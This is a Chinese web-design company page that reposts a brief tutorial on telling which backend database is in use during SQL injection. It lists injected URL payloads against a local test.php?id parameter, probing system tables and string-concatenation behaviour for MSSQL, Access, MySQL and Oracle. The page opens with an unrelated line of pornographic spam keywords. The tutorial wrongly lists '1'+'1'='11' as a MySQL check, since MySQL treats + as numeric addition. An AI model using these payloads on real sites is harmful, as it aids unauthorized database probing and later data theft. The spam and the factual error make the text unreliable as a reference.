真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

sql注入過程中后臺數(shù)據(jù)庫類型的三種判斷方式

后臺數(shù)據(jù)庫類型判斷:

創(chuàng)新互聯(lián)從2013年成立,先為開原等服務建站,開原等地企業(yè),進行企業(yè)商務咨詢服務。為開原企業(yè)網(wǎng)站制作PC+手機+微官網(wǎng)三網(wǎng)同步一站式服務解決您的所有建站問題。

一、通過頁面返回的報錯信息,一般情況下頁面報錯會顯示是什么數(shù)據(jù)庫類型,在此不多說;

二、通過各個數(shù)據(jù)庫特有的數(shù)據(jù)表來判斷:

    1、mssql數(shù)據(jù)庫

      http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

    2、access數(shù)據(jù)庫

      http://127.0.0.1/test.php?id=1 and (select count(*) from msysobjects)>0 and 1=1

    3、MySQL數(shù)據(jù)庫(mysql版本在5.0以上)

      http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

    4、oracle數(shù)據(jù)庫

      http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

三、通過各數(shù)據(jù)庫特有的連接符判斷數(shù)據(jù)庫類型:

    1、mssql數(shù)據(jù)庫

     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

    2、mysql數(shù)據(jù)庫

     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'

    3、oracle數(shù)據(jù)庫

     http://127.0.0.1/test.php?id=1 and '1'||'1'='11'

     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'


網(wǎng)頁標題:sql注入過程中后臺數(shù)據(jù)庫類型的三種判斷方式
文章轉載:http://weahome.cn/article/pijgji.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部